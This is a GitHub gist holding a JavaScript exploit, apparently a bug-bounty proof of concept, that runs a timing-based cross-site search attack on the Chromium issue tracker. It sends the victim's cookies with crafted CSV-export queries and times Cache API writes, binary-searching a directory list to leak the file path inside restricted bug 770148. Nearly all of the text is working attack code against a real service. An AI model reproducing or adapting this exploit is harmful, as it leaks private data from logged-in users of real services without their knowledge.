Skip to content

Instantly share code, notes, and snippets.

@lbherrera lbherrera/exploit.js Secret
Created Nov 13, 2018

Embed
What would you like to do?
function clear_cache() {
caches.open('cache').then(function(cache) {
cache.keys().then(function(keys) {
keys.forEach(function(request, index, array) {
cache.delete(request);
});
});
});
}
function split_array(array) {
var halfWayThough = Math.floor(array.length / 2)
var arrayFirstHalf = array.slice(0, halfWayThough);
var arraySecondHalf = array.slice(halfWayThough, array.length);
return [arrayFirstHalf, arraySecondHalf];
}
function check_end(leak, optPath, hold, xplStart) {
if (hold[0].includes(".")) {
console.log(leak + optPath + hold[0]);
console.log("Time to exfiltrate url: " + String(performance.now() - xplStart));
alert(leak + optPath + hold[0]);
return true;
}
return false;
}
function exploit(query1, query2, optPath) {
clear_cache();
var preparedQuery1 = "";
var preparedQuery2 = "";
for (var i = 0; i < query1.length; i++) {
preparedQuery1 += ` OR id:770148 "/src/third_party/${ optPath }${ query1[i] }"`;
}
for (var i = 0; i < query2.length; i++) {
preparedQuery2 += ` OR id:770148 "/src/third_party/${ optPath }${ query2[i] }"`;
}
preparedQuery1 = preparedQuery1.substring(4);
preparedQuery2 = preparedQuery2.substring(4);
var base = "https://bugs.chromium.org/p/chromium/issues/csv";
var params = `?can=1&q=${ preparedQuery1 }&colspec=AllLabels${ "+AllLabels".repeat(500) }`;
var url = base + params;
var times = [];
caches.open('cache').then(function(cache) {
fetch(url, {
mode: "no-cors",
credentials: "include"
}).then(function(response) {
function req(start, request) {
cache.put(new Request('foo' + Math.random()), request.clone()).then(function() {
var end = performance.now();
var time = end - start;
times.push(time);
if (times.length > 500) {
clear_cache();
times.shift();
var sum = times.reduce(function(a, b) { return a + b; });
var avg = sum / times.length;
if (avg >= avg_time) {
times = times.filter(function(x) {
return x < 2;
});
var query = split_array(query1);
var hold = query[0].concat(query[1]);
if (hold.length == 1) {
if (check_end(leak, optPath, hold, xplStart)) return;
var new_query = split_array(dirs[hold[0]]);
var newPath = optPath + hold[0];
return exploit(new_query[0], new_query[1], newPath);
}
console.log(query1);
return exploit(query[0], query[1], optPath);
} else {
var query = split_array(query2);
var hold = query[0].concat(query[1]);
if (hold.length == 1) {
if (check_end(leak, optPath, hold, xplStart)) return;
var new_query = split_array(dirs[hold[0]]);
var newPath = optPath + hold[0];
return exploit(new_query[0], new_query[1], newPath);
}
console.log(query2);
return exploit(query[0], query[1], optPath);
}
return;
}
req(performance.now(), request);
});
}
req(performance.now(), response);
});
});
}
let avg_time = 2;
let leak = "https://cs.chromium.org/chromium/src/third_party/";
let dirs = {}
dirs["third_party/"] = ["Python-Markdown/","SPIRV-Tools/","WebKit/","accessibility-audit/","accessibility_test_framework/","adobe/","afl/","analytics/","android_async_task/","android_crazy_linker/","android_data_chart/","android_deps/","android_media/","android_ndk/","android_opengl/","android_platform/","android_protobuf/","android_support_test_runner/","android_swipe_refresh/","android_system_sdk/","android_tools/","angle/","apache-portable-runtime/","apache-win32/","apk-patch-size-estimator/","apple_apsl/","apple_sample_code/","ashmem/","auto/","axe-core/","bazel/","bidichecker/","binutils/","bison/","blanketjs/","blink/","boringssl/","bouncycastle/","breakpad/","brotli/","bspatch/","byte_buddy/","cacheinvalidation/","catapult/","ced/","chaijs/","checkstyle/","chromite/","cld_3/","closure_compiler/","colorama/","crashpad/","crc32c/","cros_system_api/","custom_tabs_client/","d3/","decklink/","depot_tools/","deqp/","devscripts/","devtools-node-modules/","dom_distiller_js/","elfutils/","errorprone/","espresso/","eu-strip/","expat/","feed/","ffmpeg/","fips181/","flac/","flatbuffers/","flot/","fontconfig/","freetype/","gardiner_mod/","gestures/","gif_player/","glslang/","glslang-angle/","gnu_binutils/","google_appengine_cloudstorage/","google_input_tools/","google_toolbox_for_mac/","googletest/","gperf/","gradle_wrapper/","gson/","guava/","gvr-android-keyboard/","gvr-android-sdk/","haha/","hamcrest/","harfbuzz-ng/","hunspell/","hunspell_dictionaries/","iaccessible2/","iccjpeg/","icu/","icu4j/","ijar/","ink/","inspector_protocol/","instrumented_libraries/","intellij/","isimpledom/","javax_inject/","jinja2/","jmake/","jsoncpp/","jsr-305/","jstemplate/","junit/","khronos/","lcov/","leakcanary/","leveldatabase/","libFuzzer/","libXNVCtrl/","libaddressinput/","libaom/","libdrm/","libevdev/","libjingle_xmpp/","libjpeg/","libjpeg_turbo/","liblouis/","libovr/","libphonenumber/","libpng/","libprotobuf-mutator/","libsecret/","libsrtp/","libsync/","libudev/","libusb/","libvpx/","libwebm/","libwebp/","libxml/","libxslt/","libyuv/","lighttpd/","logilab/","lss/","lzma_sdk/","mach_override/","markdown/","markupsafe/","material_design_icons/","mesa/","metrics_proto/","mingw-w64/","minigbm/","minizip/","mocha/","mockito/","modp_b64/","molokocacao/","motemplate/","mozilla/","nacl_sdk_binaries/","netty-tcnative/","netty4/","node/","objenesis/","ocmock/","openh264/","openmax_dl/","openvr/","opus/","ots/","ow2_asm/","pdfium/","pefile/","perfetto/","perl/","pexpect/","ply/","polymer/","proguard/","protobuf/","pycoverage/","pyelftools/","pyftpdlib/","pylint/","pymock/","pystache/","pywebsocket/","qcms/","qunit/","re2/","requests/","rnnoise/","robolectric/","s2cellid/","sfntly/","shaderc/","simplejson/","sinonjs/","skia/","smhasher/","snappy/","speech-dispatcher/","spirv-headers/","spirv-tools-angle/","sqlite/","sqlite4java/","sudden_motion_sensor/","swiftshader/","tcmalloc/","test_fonts/","tlslite/","typ/","ub-uiautomator/","unrar/","usb_ids/","usrsctp/","v4l-utils/","visualmetrics/","vulkan/","vulkan-validation-layers/","wayland/","wayland-protocols/","wds/","web-animations-js/","webdriver/","webgl/","webrtc/","webrtc_overrides/","widevine/","win_build_output/","woff2/","wtl/","xdg-utils/","xstream/","yara/","yasm/","zlib/"];
dirs["pdfium/"] = ["build_overrides/","core/","docs/","fpdfsdk/","fxbarcode/","fxjs/","infra/","public/","samples/","skia/","testing/","third_party/","tools/","xfa/"];
dirs["fpdfsdk/"] = ["formfiller/","fpdfxfa/","pwl/"];
dirs["pwl/"] = ["README.md","cpwl_appstream.cpp","cpwl_appstream.h","cpwl_button.cpp","cpwl_button.h","cpwl_caret.cpp","cpwl_caret.h","cpwl_combo_box.cpp","cpwl_combo_box.h","cpwl_combo_box_embeddertest.cpp","cpwl_edit.cpp","cpwl_edit.h","cpwl_edit_ctrl.cpp","cpwl_edit_ctrl.h","cpwl_edit_embeddertest.cpp","cpwl_edit_impl.cpp","cpwl_edit_impl.h","cpwl_font_map.cpp","cpwl_font_map.h","cpwl_icon.cpp","cpwl_icon.h","cpwl_list_box.cpp","cpwl_list_box.h","cpwl_list_impl.cpp","cpwl_list_impl.h","cpwl_scroll_bar.cpp","cpwl_scroll_bar.h","cpwl_special_button.cpp","cpwl_special_button.h","cpwl_timer.cpp","cpwl_timer.h","cpwl_timer_handler.cpp","cpwl_timer_handler.h","cpwl_wnd.cpp","cpwl_wnd.h"];
var third_party = split_array(dirs["third_party/"]);
var xplStart = performance.now();
exploit(third_party[0], third_party[1], "");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.